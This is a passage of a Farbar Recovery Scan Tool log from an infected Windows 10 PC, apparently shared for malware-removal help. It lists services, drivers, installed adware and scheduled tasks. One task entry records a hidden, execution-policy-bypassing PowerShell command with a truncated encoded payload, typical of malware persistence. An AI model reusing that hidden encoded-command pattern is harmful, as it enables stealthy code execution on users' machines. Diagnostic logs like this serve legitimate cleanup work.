CHR Extension: (Chrome Web Store Payments) - C:\Users\Randy\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-08-06]
CHR Extension: (Gmail) - C:\Users\Randy\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2016-01-30]
CHR Extension: (Chrome Media Router) - C:\Users\Randy\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2016-08-08]
CHR HKLM\...\Chrome\Extension: [kofkpgiaknijknhajbhnghkodiccblkg] - hxxps://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-2783097096-289569773-1546617986-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [kofkpgiaknijknhajbhnghkodiccblkg] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [kofkpgiaknijknhajbhnghkodiccblkg] - hxxps://clients2.google.com/service/update2/crx

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 AMD FUEL Service; C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Service.exe [361984 2012-02-10] (Advanced Micro Devices, Inc.) [File not signed]
R2 BackupService; C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupService.exe [247808 2016-05-06] (SpeedyPC Software) [File not signed]
R2 BitDefenderCOM; C:\Program Files\BDServices\BitDefenderCom.exe [1012736 2016-06-24] (Digital Care Solutions) [File not signed]
R3 scan; C:\Program Files\BDServices\scan.dll [602456 2016-06-14] (Bitdefender)
R2 SlimService; C:\Program Files\SlimService\SlimServiceFactory.exe [252096 2016-07-25] (SlimWare Utilities, Inc.)
R2 SynTPEnhService; C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe [253960 2016-04-27] (Synaptics Incorporated)
R3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [364464 2015-10-29] (Microsoft Corporation)
R2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [24864 2016-06-30] (Microsoft Corporation)
R2 ZAtheros Bt&Wlan Coex Agent; C:\Program Files (x86)\Bluetooth Suite\Ath_CoexAgent.exe [158880 2012-01-19] (Atheros) [File not signed]

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R3 AtiHDAudioService; C:\WINDOWS\system32\drivers\AtihdWT6.sys [102912 2015-05-28] (Advanced Micro Devices)
S3 lehidmini; C:\WINDOWS\system32\drivers\leath_hid.sys [36128 2012-01-19] (Atheros) [File not signed]
R0 MBAMSwissArmy; C:\WINDOWS\System32\drivers\MBAMSwissArmy.sys [136408 2015-12-11] (Malwarebytes Corporation)
R3 RSP2STOR; C:\WINDOWS\system32\DRIVERS\RtsP2Stor.sys [310528 2015-06-05] (Realtek Semiconductor Corp.)
R3 rt640x64; C:\WINDOWS\System32\drivers\rt640x64.sys [589824 2015-10-29] (Realtek )
R2 sbmntr; C:\Program Files (x86)\YTDownloader\sbmntr.sys [58528 2015-10-22] (YTDownloader)
S3 ssmirrdr; C:\WINDOWS\system32\DRIVERS\ssmirrdr.sys [10112 2015-06-29] (support.com, Inc)
S3 SWDUMon; C:\WINDOWS\system32\DRIVERS\SWDUMon.sys [13920 2017-02-10] ()
R3 Trufos; C:\WINDOWS\System32\DRIVERS\Trufos.sys [452040 2016-06-14] (BitDefender S.R.L.)
S1 vwcgkjth; C:\WINDOWS\system32\drivers\vwcgkjth.sys [55168 2017-02-10] (Microsoft Corporation)
S0 WdBoot; C:\WINDOWS\System32\drivers\WdBoot.sys [44568 2015-10-29] (Microsoft Corporation)
R0 WdFilter; C:\WINDOWS\System32\drivers\WdFilter.sys [293216 2015-10-29] (Microsoft Corporation)
R3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [118112 2015-10-29] (Microsoft Corporation)
R3 WirelessKeyboardFilter; C:\WINDOWS\System32\drivers\WirelessKeyboardFilter.sys [49896 2016-07-22] (Microsoft Corporation)
U3 idsvc; no ImagePath
U3 wpcsvc; no ImagePath

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2017-02-10 21:46 - 2017-02-10 21:46 - 00055168 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\vwcgkjth.sys
2017-02-10 21:46 - 2017-02-10 21:46 - 00001291 _____ C:\Users\Randy\Desktop\Google Chrome.lnk
2017-02-10 21:27 - 2017-02-10 21:47 - 00000000 ____D C:\Users\Randy\Desktop\Virus
2017-02-10 21:27 - 2017-02-10 21:27 - 00000000 ____D C:\Users\Randy\Desktop\New folder

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2017-02-10 21:50 - 2016-08-08 22:41 - 00000512 _____ C:\WINDOWS\Tasks\SpeedyBackup reigistration schedule.job
2017-02-10 21:47 - 2015-10-29 23:24 - 00000000 ____D C:\WINDOWS\AppReadiness
2017-02-10 21:47 - 2014-09-12 16:11 - 00000000 ____D C:\FRST
2017-02-10 21:46 - 2016-02-15 14:41 - 00000000 ____D C:\Users\Randy\AppData\Local\{3A700C2C-1ED8-6094-7340-457C5728B9E4}
2017-02-10 21:46 - 2015-10-29 23:24 - 00000000 ___HD C:\Program Files\WindowsApps
2017-02-10 21:45 - 2016-02-02 10:45 - 00000000 ____D C:\Users\Randy\AppData\Local\Packages
2017-02-10 21:42 - 2016-05-14 18:42 - 00000284 _____ C:\WINDOWS\Tasks\{4E20A085-1B30-164D-0726-6688F373B3A8}.job
2017-02-10 21:41 - 2016-02-15 14:41 - 00000284 _____ C:\WINDOWS\Tasks\UpdateTask.job
2017-02-10 21:36 - 2013-01-03 20:56 - 00003416 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA
2017-02-10 21:36 - 2013-01-03 20:56 - 00003292 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore
2017-02-10 21:33 - 2015-10-29 23:21 - 00000000 ____D C:\WINDOWS\INF
2017-02-10 21:31 - 2012-03-01 11:01 - 00000830 _____ C:\WINDOWS\Tasks\Adobe Flash Player Updater.job
2017-02-10 21:24 - 2013-02-24 22:05 - 00002457 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Reader XI.lnk
2017-02-10 21:23 - 2016-02-02 10:17 - 01010686 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2017-02-10 21:21 - 2016-08-08 22:41 - 00000496 _____ C:\WINDOWS\Tasks\SpeedyBackup Startup.job
2017-02-10 21:19 - 2015-10-29 23:24 - 00000000 ____D C:\WINDOWS\system32\NDF
2017-02-10 21:18 - 2016-08-08 20:54 - 00000474 _____ C:\WINDOWS\Tasks\RegCure Pro Startup.job
2017-02-10 21:17 - 2016-08-06 19:12 - 00000432 _____ C:\WINDOWS\Tasks\DriverUpdate Startup.job
2017-02-10 21:16 - 2016-08-08 22:41 - 00000530 _____ C:\WINDOWS\Tasks\SpeedyPC Update Version3 Startup Task.job
2017-02-10 21:16 - 2016-08-08 22:41 - 00000522 _____ C:\WINDOWS\Tasks\SpeedyBackup reigistration schedule startup.job
2017-02-10 21:16 - 2016-01-15 09:52 - 00013920 _____ C:\WINDOWS\system32\Drivers\SWDUMon.sys

==================== Files in the root of some directories =======

2016-08-08 20:54 - 2017-02-10 21:18 - 0000115 _____ () C:\Users\Randy\AppData\Roaming\LogFile.txt
2016-06-19 06:26 - 2016-06-19 06:26 - 2049556 _____ () C:\Users\Randy\AppData\Roaming\sb0.dat
2016-06-10 06:41 - 2016-06-10 06:41 - 2049556 _____ () C:\Users\Randy\AppData\Roaming\sb203.dat
2016-02-17 11:41 - 2016-08-05 17:41 - 0000228 _____ () C:\Users\Randy\AppData\Roaming\WB.CFG
2015-11-15 15:05 - 2015-11-15 15:05 - 0002560 _____ () C:\Users\Randy\AppData\Local\uninstall.exe
2015-01-27 15:51 - 2015-01-27 15:51 - 0000057 _____ () C:\ProgramData\Ament.ini

Files to move or delete:
====================
C:\Program Files (x86)\NowUSeeItPlayer\NowUSeeItPlayer.exe
C:\Windows\Tasks\{4E20A085-1B30-164D-0726-6688F373B3A8}.job


Some files in TEMP:
====================
2016-08-08 22:40 - 2016-08-08 22:41 - 8464000 _____ (SpeedyPC Software Inc.) C:\Users\Randy\AppData\Local\Temp\OMD5938.tmp.exe

==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe => File is digitally signed
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2016-08-08 21:12

==================== End of FRST.txt ============================
 
Addition 1:
Ran by Randy (10-02-2017 21:51:52)
Running from C:\Users\Randy\Desktop\Virus
Windows 10 Home Version 1511 (X64) (2016-02-02 18:44:56)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-2783097096-289569773-1546617986-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-2783097096-289569773-1546617986-503 - Limited - Disabled)
Guest (S-1-5-21-2783097096-289569773-1546617986-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-2783097096-289569773-1546617986-1011 - Limited - Enabled)
Randy (S-1-5-21-2783097096-289569773-1546617986-1001 - Administrator - Enabled) => C:\Users\Randy

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Adobe Reader XI (11.0.19) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.19 - Adobe Systems Incorporated)
Adobe Shockwave Player 11.6 (HKLM-x32\...\Adobe Shockwave Player) (Version: 11.6.3.633 - Adobe Systems, Inc.)
AMD Catalyst Install Manager (HKLM\...\{9D1400EC-5703-3983-53B7-AEFB8BFD1CFA}) (Version: 3.0.864.0 - Advanced Micro Devices, Inc.)
AOL Uninstaller (Choose which Products to Remove) (HKLM-x32\...\AOL Uninstaller) (Version: - AOL Inc.)
Atheros Bluetooth Suite (64) (HKLM\...\{230D1595-57DA-4933-8C4E-375797EBB7E1}) (Version: 7.4.0.120 - Atheros)
Atheros Driver Installation Program (HKLM-x32\...\{C3A32068-8AB1-4327-BB16-BED9C6219DC7}) (Version: 9.2 - Atheros)
Blio (HKLM-x32\...\{74A8E1BE-D438-4C35-ABFF-3A1EAF17526E}) (Version: 2.2.8530 - K-NFB Reading Technology, Inc.)
Cisco EAP-FAST Module (HKLM-x32\...\{64BF0187-F3D2-498B-99EA-163AF9AE6EC9}) (Version: 2.2.14 - Cisco Systems, Inc.)
Cisco LEAP Module (HKLM-x32\...\{51C7AD07-C3F6-4635-8E8A-231306D810FE}) (Version: 1.0.19 - Cisco Systems, Inc.)
Cisco PEAP Module (HKLM-x32\...\{ED5776D5-59B4-46B7-AF81-5F2D94D7C640}) (Version: 1.1.6 - Cisco Systems, Inc.)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
DHTML Editing Component (HKLM-x32\...\{2EA870FA-585F-4187-903D-CB9FFD21E2E0}) (Version: 6.02.0001 - Microsoft Corporation)
Download Updater (AOL Inc.) (HKLM-x32\...\SoftwareUpdUtility) (Version: - AOL Inc.) <==== ATTENTION
Driver Detective (HKLM-x32\...\DriversHQ.DriverDetective.Client) (Version: 10.1.2.44 - PC Drivers HeadQuarters LP)
Driver Restore (HKLM\...\Driver Restore) (Version: 2.5.0.0 - 383 Media, Inc.)
DriverUpdate (HKLM-x32\...\DriverUpdate) (Version: 2.6.4 - Slimware Utilities Holdings, Inc.)
DriverUpdate (x32 Version: 2.6.4 - Slimware Utilities Holdings, Inc.) Hidden
Ear Training 101 - Full Version (HKLM-x32\...\Ear Training 101 - Full Version4.0) (Version: - )
Ear Training 101 & Rhythmic Patterns (HKLM-x32\...\Ear Training 101 & Rhythmic Patternsv. 4.0) (Version: v. 4.0 - Music Unlimited Inc.)
ESU for Microsoft Windows 7 SP1 (HKLM-x32\...\{768A6276-5822-489C-8A2B-67190F745655}) (Version: 4.1.2 - Hewlett-Packard)
Evernote v. 4.5.2 (HKLM-x32\...\{8CE152BA-1D16-11E1-867D-984BE15F174E}) (Version: 4.5.2.5904 - Evernote Corp.)
FileASSASSIN (HKLM-x32\...\FileASSASSIN) (Version: 1.06 - Malwarebytes)
FromDocToPDF Internet Explorer Homepage and New Tab (HKU\S-1-5-21-2783097096-289569773-1546617986-1001\...\FromDocToPDFTooltab Uninstall Internet Explorer) (Version: - Mindspark Interactive Network) <==== ATTENTION
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 52.0.2743.116 - Google Inc.)
Google Update Helper (x32 Version: 1.3.32.7 - Google Inc.) Hidden
Hewlett-Packard ACLM.NET v1.1.2.0 (x32 Version: 1.00.0000 - Hewlett-Packard) Hidden
HP 3D DriveGuard (HKLM\...\{B1A6285F-C31A-4482-8EA0-9445E4C1DCEA}) (Version: 4.1.10.1 - Hewlett-Packard Company)
HP Application Assistant (HKLM\...\{6032497A-4479-462B-ADB8-A0A372BB9A23}) (Version: 1.0.409.3882 - Hewlett-Packard)
HP Connection Manager (HKLM-x32\...\{B65FCAA5-F3A6-4B3F-ABEE-CBC2B085796B}) (Version: 4.1.25.1 - Hewlett-Packard Company)
HP CoolSense (HKLM-x32\...\{16B7BDA1-B967-4D2D-8B27-E12727C28350}) (Version: 2.10.3 - Hewlett-Packard Company)
HP Deskjet 1510 series Basic Device Software (HKLM\...\{D17E60E8-478A-4D4A-8147-21D481B5CA55}) (Version: 32.2.188.47710 - Hewlett-Packard Co.)
HP Deskjet 1510 series Help (HKLM-x32\...\{2E25FCEB-EFCB-4696-AA01-D3CBAC721831}) (Version: 30.0.0 - Hewlett Packard)
HP Documentation (HKLM-x32\...\{16652164-D80F-4EE6-90C6-2E8D5D06092A}) (Version: 1.1.0.0 - Hewlett-Packard)
HP FWUpdateEDO2 (HKLM-x32\...\{415FA9AD-DA10-4ABE-97B6-5051D4795C90}) (Version: 1.2.0.0 - Hewlett-Packard)
HP OfficeJet 3830 series Basic Device Software (HKLM\...\{644380A4-11D0-48CB-AAB8-CCB6BD072784}) (Version: 36.0.72.54013 - Hewlett-Packard Co.)
HP On Screen Display (HKLM-x32\...\{ED1BD69A-07E3-418C-91F1-D856582581BF}) (Version: 1.3.5 - Hewlett-Packard Company)
HP Photo Creations (HKLM-x32\...\HP Photo Creations) (Version: 1.0.0.7702 - HP)
HP Quick Launch (HKLM-x32\...\{C61FCEC2-3ED4-496E-B4B4-1CED423824B9}) (Version: 2.6.2 - Hewlett-Packard Company)
HP Security Assistant (HKLM\...\{F9DF0B5D-554B-45D2-8698-7C467FAF4BCA}) (Version: 2.0.2 - Hewlett-Packard Company)
HP Setup (HKLM-x32\...\{F5E7D9AF-60F6-4A30-87E3-4EA94D322CE1}) (Version: 9.0.15109.3899 - Hewlett-Packard Company)
HP Setup Manager (HKLM-x32\...\{AE856388-AFAD-4753-81DF-D96B19D0A17C}) (Version: 1.2.14901.3869 - Hewlett-Packard Company)
HP Software Framework (HKLM-x32\...\{6DE80866-EF92-47C1-80F5-1EA83B7A0AA2}) (Version: 4.5.4.1 - Hewlett-Packard Company)
HP Update (HKLM-x32\...\{912D30CF-F39E-4B31-AD9A-123C6B794EE2}) (Version: 5.005.002.002 - Hewlett-Packard)
HPDiagnosticAlert (x32 Version: 1.00.0001 - Microsoft) Hidden
IDT Audio (HKLM-x32\...\{E3A5A8AB-58F6-45FF-AFCB-C9AE18C05001}) (Version: 1.0.6381.0 - IDT)
iSEEK AnswerWorks English Runtime (HKLM-x32\...\{18A8E78B-9EF2-496E-B310-BCD8E4C1DAB3}) (Version: 010.000.0101 - Vantage Linguistics)
Itibiti RTC (x32 Version: 0.0.1 - Itibiti Inc) Hidden <==== ATTENTION
Junk Mail filter update (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Mesh Runtime (x32 Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Microsoft Office 2010 (HKLM-x32\...\{95140000-0070-0000-0000-0000000FF1CE}) (Version: 14.0.4763.1000 - Microsoft Corporation)
Microsoft Office Access database engine 2007 (English) (HKLM-x32\...\{90120000-00D1-0409-0000-0000000FF1CE}) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Office Click-to-Run 2010 (HKLM-x32\...\Office14.Click2Run) (Version: 14.0.4763.1000 - Microsoft Corporation)
Microsoft Office Starter 2010 - English (HKLM-x32\...\{90140011-0066-0409-0000-0000000FF1CE}) (Version: 14.0.5139.5005 - Microsoft Corporation)
Microsoft Office Word Viewer 2003 (HKLM-x32\...\{90850409-6000-11D3-8CFE-0150048383C9}) (Version: 11.0.8173.0 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.50428.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Streets & Trips 2009 (HKLM-x32\...\{C82185E8-C27B-4EF4-2009-4444BC2C2B6D}) (Version: 16.0.18.1000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.21022 (HKLM\...\{350AA351-21FA-3270-8B7A-835434E766AD}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.30319 (HKLM\...\{DA5E371C-6333-3D8A-93A4-6FD5B20BCC6E}) (Version: 10.0.30319 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.30319 (HKLM-x32\...\{196BB40D-1578-3D01-B289-BEFC77A11A1E}) (Version: 10.0.30319 - Microsoft Corporation)
Mozilla Firefox 27.0 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 27.0 (x86 en-US)) (Version: 27.0 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 27.0 - Mozilla)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
NowUSeeIt Player (HKLM-x32\...\{C0AFC06A-6C9E-420F-AABF-B1AC7EE1F589}) (Version: 1.7.0.1 - NowUSeeIt Player) <==== ATTENTION
OpenOffice 4.1.1 (HKLM-x32\...\{9395F41D-0F80-432E-9A59-B8E477E7E163}) (Version: 4.11.9775 - Apache Software Foundation)
opensource (x32 Version: 1.0.14960.3876 - Your Company Name) Hidden
PdaNet+ for Android 4.12 (HKLM-x32\...\PdaNet_is1) (Version: - June Fabrics Technology Inc)
PlayReady PC Runtime x86 (HKLM-x32\...\{CCA5EAAD-92F4-4B7A-B5EE-14294C66AB61}) (Version: 1.3.0 - Microsoft Corporation)
PowerFingers Ch. 1 (HKLM-x32\...\PowerFingers Ch. 1) (Version: - Music Unlimited Inc.)
PrintMaster 12 (HKLM-x32\...\{2A304FDE-F4E3-446D-AA0D-31425C897B71}) (Version: - Broderbund LLC)
Product Improvement Study for HP Deskjet 1510 series (HKLM\...\{35DB2630-846E-47C5-AF84-9D6AC3629F55}) (Version: 32.2.188.47710 - Hewlett-Packard Co.)
Quicken 2014 (HKLM-x32\...\{0877F595-254F-45F4-991D-3F72E86B17CE}) (Version: 23.1.7.6 - Intuit)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.48.823.2011 - Realtek)
Realtek PCIE Card Reader (HKLM-x32\...\{C1594429-8296-4652-BF54-9DBE4932A44C}) (Version: 6.1.7601.29004 - Realtek Semiconductor Corp.)
RegCure Pro (HKLM-x32\...\{C547F361-5750-4CD1-9FB6-BC93827CB6C1}) (Version: 3.3.14.1 - ParetoLogic, Inc.) <==== ATTENTION
Skype™ 7.0 (HKLM-x32\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 7.0.102 - Skype Technologies S.A.)
SlimCleaner Plus (HKLM\...\SlimCleaner Plus) (Version: 2.5.8 - Slimware Utilities Holdings, Inc.)
SlimCleaner Plus (Version: 2.5.8 - Slimware Utilities Holdings, Inc.) Hidden
SpeedyBackup (HKLM-x32\...\{6FF10046-D763-4859-A5C7-8AD81B9C8427}) (Version: 5.0.5.0 - SpeedyPC Software)
swMSM (x32 Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 19.0.12.98 - Synaptics Incorporated)
Turbo Lister 2 (HKLM-x32\...\{8927E07C-97F7-4A54-88FB-D976F50DD46E}) (Version: 2.00.0000 - eBay Inc.)
Viewpoint Media Player (HKLM-x32\...\ViewpointMediaPlayer) (Version: - )
WinALDL (HKLM-x32\...\WinALDL) (Version: - )
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 15.4.3538.0513 - Microsoft Corporation)
Windows Live Mesh ActiveX Control for Remote Connections (HKLM-x32\...\{2902F983-B4C1-44BA-B85D-5C6D52E2C441}) (Version: 15.4.5722.2 - Microsoft Corporation)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {02838A17-EB1E-41DC-A610-4FACFC9CFC90} - \Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeReminderTime -> No File <==== ATTENTION
Task: {05DF4A16-BE01-4E34-A027-CB8165CA61E8} - System32\Tasks\Microsoft\Windows\Media Center\ConfigureInternetTimeService => %SystemRoot%\ehome\ehPrivJob.exe
Task: {085C37EA-1E33-4C9E-87B8-3E576F3FE4AB} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> No File <==== ATTENTION
Task: {0B0B1AAD-0AF0-4618-BDEF-CDDEDF582AD0} - System32\Tasks\JZIP => C:\Program Files (x86)\JZIP\JZIP\JZIP.exe <==== ATTENTION
Task: {0CBCDC29-56A3-4015-A06E-8FD4AABD553B} - \SmartWeb Upgrade Trigger Task -> No File <==== ATTENTION
Task: {0CFE2E40-6A97-48C5-9F38-DE82315CF1B0} - System32\Tasks\Microsoft\Windows\UPnP\UPnPHostConfig => sc.execonfig upnphost start= auto
Task: {0EBA43D3-D7BE-4AE6-9462-F46D199BCC46} - System32\Tasks\Microsoft\Windows\Media Center\PvrScheduleTask => %SystemRoot%\ehome\mcupdate.exe
Task: {152C1E5E-5706-4609-8FFF-8D8B15AFDDAA} - System32\Tasks\{090C7947-7904-0E0F-0A11-0B7E7F79117F} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcA (the data entry has 9400 more characters). <==== ATTENTION
Task: {1C1C75BB-4B69-4971-89E7-D4A89F91354E} - System32\Tasks\CRWKRUVUBYBCAXNB => C:\ProgramData\Service1291\Service1291.exe <==== ATTENTION
Task: {1E0973D5-7653-49B7-B013-63DB348A9012} - \ShopperProJSUpd -> No File <==== ATTENTION
Task: {1EAE785B-1358-435B-86E7-5860D0FEE3D6} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION
Task: {207BFC61-FFED-4507-8EDD-6AA5AE1C8A47} - System32\Tasks\Microsoft\Windows\Media Center\RegisterSearch => %SystemRoot%\ehome\ehPrivJob.exe
Task: {2256FEB8-E941-4264-AD41-D3DD3B8E85D1} - System32\Tasks\Microsoft\Microsoft Antimalware\Microsoft Antimalware Scheduled Scan => c:\Program Files\Microsoft Security Client\MpCmdRun.exe
Task: {2391AF7C-19CC-4AED-9222-E7E2F5CF9B9F} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-09-03] (Google Inc.)
Task: {24625A46-03C1-4745-AFC8-58F70A4CA83B} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscovery => %SystemRoot%\ehome\ehPrivJob.exe
Task: {2865D75A-9EFF-4BDA-A98B-E2BAFD745E88} - System32\Tasks\Microsoft\Windows\Media Center\RecordingRestart => %SystemRoot%\ehome\ehrec.exe
Task: {2A9BA1F7-EAEA-4938-9457-630770B8CA56} - System32\Tasks\Microsoft\Windows\Media Center\PeriodicScanRetry => %windir%\ehome\MCUpdate.exe
Task: {2C627394-07F4-4001-84C6-96DA554AC5A0} - \IBUpd -> No File <==== ATTENTION
Task: {2F0B453C-7978-474F-B2DD-511436B54629} - System32\Tasks\Microsoft\Windows\Media Center\MediaCenterRecoveryTask => %SystemRoot%\ehome\mcupdate.exe
Task: {35D93F14-F697-4D00-9872-F3A2EE485306} - System32\Tasks\Beach Kit => Rundll32.exe "C:\Users\Randy\AppData\Local\Beach Kit\{B29DDEDA-90AD-4218-7C20-9BC475FF709E}\BeachKit.dll",#3
Task: {39E77F7F-3017-488D-B44D-3D34D66F423B} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant Quick Start => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPSFMessenger\HPSFMsgr.exe [2011-09-09] (Hewlett-Packard Company)
Task: {4141D743-61D5-4790-8B3F-9B77C8B78A87} - System32\Tasks\Microsoft\Windows\Media Center\ActivateWindowsSearch => %SystemRoot%\ehome\ehPrivJob.exe
Task: {477A9893-3F9C-40B5-ADA0-FC96EE6735EC} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> No File <==== ATTENTION
Task: {49E80698-374B-426E-BD1D-E0ECDA6BD4A4} - \SwiftSearch Auto Updater 1.10.0.25 Core -> No File <==== ATTENTION
Task: {4CD1D841-791C-485F-9229-FDD5EE9C27CF} - System32\Tasks\SpeedyBackup reigistration schedule startup => C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\SpeedyBackup.exe [2016-05-06] () <==== ATTENTION
Task: {4D2E3B92-6CEE-4C6C-82C1-BF7C4B59FE7E} - \systemmgr -> No File <==== ATTENTION
Task: {4DB10E48-560F-4E83-A1B5-16CEB0A07A99} - System32\Tasks\Microsoft\Windows\Media Center\ObjectStoreRecoveryTask => %SystemRoot%\ehome\mcupdate.exe
